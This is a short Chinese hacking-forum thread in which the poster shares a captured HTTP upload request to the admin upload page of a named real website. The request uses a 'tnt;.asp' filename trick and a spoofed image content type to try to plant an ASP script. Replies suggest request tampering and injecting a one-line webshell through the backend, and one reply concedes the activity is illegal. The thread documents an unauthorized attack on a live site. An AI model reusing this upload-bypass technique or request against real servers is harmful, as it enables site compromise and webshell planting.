上传文件自动命名大牛指点怎么突破
本帖最后由 wuyan 于 2016-4-15 08:11 编辑POST /admin/upload.asp?action=admin&submit=admin HTTP/1.1
Host: pdsgysyj.com
Content-Length: 7557
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://pdsgysyj.com
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/4.0 Chrome/30.0.1599.101 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2GRmdQRbVWAgpokZ
DNT: 1
Referer: http://xxxxxx.xxx/admin/upload.asp?action=admin&submit=admin 上传点可以打开
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN
Cookie: ASPSESSIONIDCSAARDQD=NLPFEDODKAMGMIMDFDIHJMEE
------WebKitFormBoundary2GRmdQRbVWAgpokZ
Content-Disposition: form-data; name="file"; filename="tnt;.asp"
Content-Type: image/jpeg 这个点无法截断 是的 接不断, 有注入,但是非法。 我也是碰到个这样的自动重命名自动改格式 。。。 测试burp或者改包实在不行就直接后台添加后缀,在不行变态点直接插一句话在后台,在不行直接去跳河!!! 66666666666666666666666 我就是来看看
页:
[1]